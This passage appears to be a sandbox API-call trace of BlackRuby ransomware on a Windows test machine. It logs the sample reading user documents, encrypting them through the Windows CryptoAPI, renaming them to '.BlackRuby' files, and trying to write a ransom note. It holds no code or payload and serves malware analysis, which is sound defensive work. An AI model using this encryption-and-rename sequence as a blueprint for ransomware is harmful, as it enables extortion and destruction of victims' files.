6hlwsf.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_YeZPuq8qrk4rPrrwXT8XyQIyYHIlQwmOwqabjGRk8YX4k.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_yezpuq8qrk4rprrwxt8xyqiyyhilqwmowqabjgrk8yx4k.blackruby")) returned 1 [0057.673] GetLastError () returned 0xb7 [0057.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.674] GetLastError () returned 0xb7 [0057.674] SetErrorMode (uMode=0x1) returned 0x0 [0057.674] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.674] GetLastError () returned 0x5 [0057.676] SetErrorMode (uMode=0x0) returned 0x1 [0057.676] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x26 [0057.676] GetLastError () returned 0x5 [0057.676] SetErrorMode (uMode=0x1) returned 0x0 [0057.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b80cf4 | out: lpFileInformation=0x1b80cf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0057.676] GetLastError () returned 0x5 [0057.676] SetErrorMode (uMode=0x0) returned 0x1 [0057.677] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.677] GetLastError () returned 0x5 [0057.677] SetErrorMode (uMode=0x1) returned 0x0 [0057.677] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.677] GetLastError () returned 0x5 [0057.678] SetErrorMode (uMode=0x0) returned 0x1 [0057.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", lpFilePart=0x0) returned 0x27 [0057.679] GetLastError () returned 0x5 [0057.679] SetErrorMode (uMode=0x1) returned 0x0 [0057.679] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\dplt5zc.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1b9eb9c | out: lpFileInformation=0x1b9eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc70f8ff0, ftCreationTime.dwHighDateTime=0x1d36edd, ftLastAccessTime.dwLowDateTime=0xe498bf20, ftLastAccessTime.dwHighDateTime=0x1d36fd1, ftLastWriteTime.dwLowDateTime=0xe498bf20, ftLastWriteTime.dwHighDateTime=0x1d36fd1, nFileSizeHigh=0x0, nFileSizeLow=0x8a1c)) returned 1 [0057.679] GetLastError () returned 0x5 [0057.679] SetErrorMode (uMode=0x0) returned 0x1 [0057.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", lpFilePart=0x0) returned 0x27 [0057.679] GetLastError () returned 0x5 [0057.679] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", lpFilePart=0x0) returned 0x27 [0057.679] GetLastError () returned 0x5 [0057.679] SetErrorMode (uMode=0x1) returned 0x0 [0057.679] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\dplt5zc.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.679] GetLastError () returned 0x0 [0057.679] GetFileType (hFile=0x184) returned 0x1 [0057.679] SetErrorMode (uMode=0x0) returned 0x1 [0057.679] GetFileType (hFile=0x184) returned 0x1 [0057.679] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x8a1c [0057.679] GetLastError () returned 0x0 [0057.679] ReadFile (in: hFile=0x184, lpBuffer=0x1ba0cfc, nNumberOfBytesToRead=0x8a1c, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ba0cfc*, lpNumberOfBytesRead=0x18ed84*=0x8a1c, lpOverlapped=0x0) returned 1 [0057.680] GetLastError () returned 0x0 [0057.680] CloseHandle (hObject=0x184) returned 1 [0057.680] GetLastError () returned 0x0 [0057.680] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", lpFilePart=0x0) returned 0x27 [0057.680] GetLastError () returned 0x0 [0057.680] SetErrorMode (uMode=0x1) returned 0x0 [0057.680] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\dplt5zc.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc70f8ff0, ftCreationTime.dwHighDateTime=0x1d36edd, ftLastAccessTime.dwLowDateTime=0xe498bf20, ftLastAccessTime.dwHighDateTime=0x1d36fd1, ftLastWriteTime.dwLowDateTime=0xe498bf20, ftLastWriteTime.dwHighDateTime=0x1d36fd1, nFileSizeHigh=0x0, nFileSizeLow=0x8a1c)) returned 1 [0057.681] GetLastError () returned 0x0 [0057.681] SetErrorMode (uMode=0x0) returned 0x1 [0057.681] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0057.681] GetLastError () returned 0x0 [0057.720] CryptImportKey (in: hProv=0x37c680, pbData=0x1c0c4cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0057.720] GetLastError () returned 0x0 [0057.720] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.720] GetLastError () returned 0x0 [0057.726] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0057.726] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1c39518*=0x1, dwFlags=0x0) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1c394e4, dwFlags=0x0) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c39560*, pdwDataLen=0x18ed74*=0x8b10, dwBufLen=0x8b10 | out: pbData=0x1c39560*, pdwDataLen=0x18ed74*=0x8b10) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4abac*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c4abac*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4abdc*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c4abdc*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.726] GetLastError () returned 0x0 [0057.726] CryptDestroyKey (hKey=0x360da0) returned 1 [0057.726] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.726] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.727] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", lpFilePart=0x0) returned 0x27 [0057.727] GetLastError () returned 0x0 [0057.727] SetErrorMode (uMode=0x1) returned 0x0 [0057.727] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\dplt5zc.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.728] GetLastError () returned 0xb7 [0057.728] GetFileType (hFile=0x184) returned 0x1 [0057.728] SetErrorMode (uMode=0x0) returned 0x1 [0057.728] GetFileType (hFile=0x184) returned 0x1 [0057.729] CloseHandle (hObject=0x184) returned 1 [0057.729] GetLastError () returned 0xb7 [0057.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx", lpFilePart=0x0) returned 0x27 [0057.729] GetLastError () returned 0xb7 [0057.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_eKBOzjfgIaFAXZDykJ8eaf82UwUKONwrifvHrZ3XjH3P3ox.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_eKBOzjfgIaFAXZDykJ8eaf82UwUKONwrifvHrZ3XjH3P3ox.BlackRuby", lpFilePart=0x0) returned 0x5e [0057.729] GetLastError () returned 0xb7 [0057.729] SetErrorMode (uMode=0x1) returned 0x0 [0057.729] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\dplt5zc.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc70f8ff0, ftCreationTime.dwHighDateTime=0x1d36edd, ftLastAccessTime.dwLowDateTime=0xe498bf20, ftLastAccessTime.dwHighDateTime=0x1d36fd1, ftLastWriteTime.dwLowDateTime=0x2a9a90e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x8b20)) returned 1 [0057.729] GetLastError () returned 0xb7 [0057.729] SetErrorMode (uMode=0x0) returned 0x1 [0057.729] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\DPLT5Zc.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\dplt5zc.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_eKBOzjfgIaFAXZDykJ8eaf82UwUKONwrifvHrZ3XjH3P3ox.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_ekbozjfgiafaxzdykj8eaf82uwukonwrifvhrz3xjh3p3ox.blackruby")) returned 1 [0057.742] GetLastError () returned 0xb7 [0057.742] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.742] GetLastError () returned 0xb7 [0057.742] SetErrorMode (uMode=0x1) returned 0x0 [0057.742] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.742] GetLastError () returned 0x5 [0057.743] SetErrorMode (uMode=0x0) returned 0x1 [0057.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", lpFilePart=0x0) returned 0x27 [0057.743] GetLastError () returned 0x5 [0057.743] SetErrorMode (uMode=0x1) returned 0x0 [0057.743] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx" (normalized: "c:\\users\\eebsym5\\documents\\elpzmuy.docx"), fInfoLevelId=0x0, lpFileInformation=0x1c81e38 | out: lpFileInformation=0x1c81e38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332e030, ftCreationTime.dwHighDateTime=0x1d35cb5, ftLastAccessTime.dwLowDateTime=0x3fedd530, ftLastAccessTime.dwHighDateTime=0x1d339c8, ftLastWriteTime.dwLowDateTime=0x3fedd530, ftLastWriteTime.dwHighDateTime=0x1d339c8, nFileSizeHigh=0x0, nFileSizeLow=0x12b1c)) returned 1 [0057.743] GetLastError () returned 0x5 [0057.743] SetErrorMode (uMode=0x0) returned 0x1 [0057.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", lpFilePart=0x0) returned 0x27 [0057.743] GetLastError () returned 0x5 [0057.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", lpFilePart=0x0) returned 0x27 [0057.743] GetLastError () returned 0x5 [0057.743] SetErrorMode (uMode=0x1) returned 0x0 [0057.744] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx" (normalized: "c:\\users\\eebsym5\\documents\\elpzmuy.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.744] GetLastError () returned 0x0 [0057.744] GetFileType (hFile=0x184) returned 0x1 [0057.744] SetErrorMode (uMode=0x0) returned 0x1 [0057.744] GetFileType (hFile=0x184) returned 0x1 [0057.744] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x12b1c [0057.744] GetLastError () returned 0x0 [0057.744] ReadFile (in: hFile=0x184, lpBuffer=0x1c83d70, nNumberOfBytesToRead=0x12b1c, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c83d70*, lpNumberOfBytesRead=0x18ed84*=0x12b1c, lpOverlapped=0x0) returned 1 [0057.745] GetLastError () returned 0x0 [0057.745] CloseHandle (hObject=0x184) returned 1 [0057.745] GetLastError () returned 0x0 [0057.745] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", lpFilePart=0x0) returned 0x27 [0057.745] GetLastError () returned 0x0 [0057.745] SetErrorMode (uMode=0x1) returned 0x0 [0057.745] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx" (normalized: "c:\\users\\eebsym5\\documents\\elpzmuy.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332e030, ftCreationTime.dwHighDateTime=0x1d35cb5, ftLastAccessTime.dwLowDateTime=0x3fedd530, ftLastAccessTime.dwHighDateTime=0x1d339c8, ftLastWriteTime.dwLowDateTime=0x3fedd530, ftLastWriteTime.dwHighDateTime=0x1d339c8, nFileSizeHigh=0x0, nFileSizeLow=0x12b1c)) returned 1 [0057.745] GetLastError () returned 0x0 [0057.745] SetErrorMode (uMode=0x0) returned 0x1 [0057.756] CryptImportKey (in: hProv=0x37c818, pbData=0x1d03740, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0057.756] GetLastError () returned 0x0 [0057.756] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.756] GetLastError () returned 0x0 [0057.761] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.761] GetLastError () returned 0x0 [0057.761] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0057.761] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.761] GetLastError () returned 0x0 [0057.761] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1d3078c*=0x1, dwFlags=0x0) returned 1 [0057.761] GetLastError () returned 0x0 [0057.761] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1d30758, dwFlags=0x0) returned 1 [0057.761] GetLastError () returned 0x0 [0057.761] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d307d4*, pdwDataLen=0x18ed74*=0x12c10, dwBufLen=0x12c10 | out: pbData=0x1d307d4*, pdwDataLen=0x18ed74*=0x12c10) returned 1 [0057.762] GetLastError () returned 0x0 [0057.762] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d56020*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d56020*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.762] GetLastError () returned 0x0 [0057.762] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d56050*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d56050*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.762] GetLastError () returned 0x0 [0057.765] CryptDestroyKey (hKey=0x360fa0) returned 1 [0057.765] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.765] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.765] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", lpFilePart=0x0) returned 0x27 [0057.765] GetLastError () returned 0x0 [0057.765] SetErrorMode (uMode=0x1) returned 0x0 [0057.765] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx" (normalized: "c:\\users\\eebsym5\\documents\\elpzmuy.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.766] GetLastError () returned 0xb7 [0057.766] GetFileType (hFile=0x184) returned 0x1 [0057.767] SetErrorMode (uMode=0x0) returned 0x1 [0057.767] GetFileType (hFile=0x184) returned 0x1 [0057.767] WriteFile (in: hFile=0x184, lpBuffer=0x1b59434*, nNumberOfBytesToWrite=0x12c20, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1b59434*, lpNumberOfBytesWritten=0x18ed90*=0x12c20, lpOverlapped=0x0) returned 1 [0057.768] GetLastError () returned 0xb7 [0057.768] CloseHandle (hObject=0x184) returned 1 [0057.769] GetLastError () returned 0xb7 [0057.769] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx", lpFilePart=0x0) returned 0x27 [0057.769] GetLastError () returned 0xb7 [0057.769] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_9Mdq4yHTW1RTJfYSo1W23J9B17Xi9eXBIfeTnMouEKAcWF.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_9Mdq4yHTW1RTJfYSo1W23J9B17Xi9eXBIfeTnMouEKAcWF.BlackRuby", lpFilePart=0x0) returned 0x5d [0057.769] GetLastError () returned 0xb7 [0057.769] SetErrorMode (uMode=0x1) returned 0x0 [0057.769] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx" (normalized: "c:\\users\\eebsym5\\documents\\elpzmuy.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332e030, ftCreationTime.dwHighDateTime=0x1d35cb5, ftLastAccessTime.dwLowDateTime=0x3fedd530, ftLastAccessTime.dwHighDateTime=0x1d339c8, ftLastWriteTime.dwLowDateTime=0x2a9f53a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12c20)) returned 1 [0057.770] GetLastError () returned 0xb7 [0057.770] SetErrorMode (uMode=0x0) returned 0x1 [0057.770] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\elpzMUY.docx" (normalized: "c:\\users\\eebsym5\\documents\\elpzmuy.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_9Mdq4yHTW1RTJfYSo1W23J9B17Xi9eXBIfeTnMouEKAcWF.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_9mdq4yhtw1rtjfyso1w23j9b17xi9exbifetnmouekacwf.blackruby")) returned 1 [0057.770] GetLastError () returned 0xb7 [0057.771] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.771] GetLastError () returned 0xb7 [0057.771] SetErrorMode (uMode=0x1) returned 0x0 [0057.771] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.771] GetLastError () returned 0x5 [0057.772] SetErrorMode (uMode=0x0) returned 0x1 [0057.773] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", lpFilePart=0x0) returned 0x31 [0057.773] GetLastError () returned 0x5 [0057.773] SetErrorMode (uMode=0x1) returned 0x0 [0057.773] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fs5l5p s34rawzeokv.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1b8912c | out: lpFileInformation=0x1b8912c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8212fa60, ftCreationTime.dwHighDateTime=0x1d35266, ftLastAccessTime.dwLowDateTime=0x8247d5e0, ftLastAccessTime.dwHighDateTime=0x1d34beb, ftLastWriteTime.dwLowDateTime=0x8247d5e0, ftLastWriteTime.dwHighDateTime=0x1d34beb, nFileSizeHigh=0x0, nFileSizeLow=0x10f53)) returned 1 [0057.773] GetLastError () returned 0x5 [0057.773] SetErrorMode (uMode=0x0) returned 0x1 [0057.773] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", lpFilePart=0x0) returned 0x31 [0057.773] GetLastError () returned 0x5 [0057.773] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", lpFilePart=0x0) returned 0x31 [0057.773] GetLastError () returned 0x5 [0057.773] SetErrorMode (uMode=0x1) returned 0x0 [0057.773] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fs5l5p s34rawzeokv.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.773] GetLastError () returned 0x0 [0057.773] GetFileType (hFile=0x184) returned 0x1 [0057.773] SetErrorMode (uMode=0x0) returned 0x1 [0057.773] GetFileType (hFile=0x184) returned 0x1 [0057.774] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x10f53 [0057.774] GetLastError () returned 0x0 [0057.774] ReadFile (in: hFile=0x184, lpBuffer=0x1b8adbc, nNumberOfBytesToRead=0x10f53, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b8adbc*, lpNumberOfBytesRead=0x18ed84*=0x10f53, lpOverlapped=0x0) returned 1 [0057.774] GetLastError () returned 0x0 [0057.775] CloseHandle (hObject=0x184) returned 1 [0057.775] GetLastError () returned 0x0 [0057.775] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\fs5l5p S34rAWZEOKV.rtf", lpFilePart=0x0) returned 0x31 [0057.775] GetLastError () returned 0x0 [0057.775] SetErrorMode (uMode=0x1) returned 0x0 [0057.775] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fs5l5p 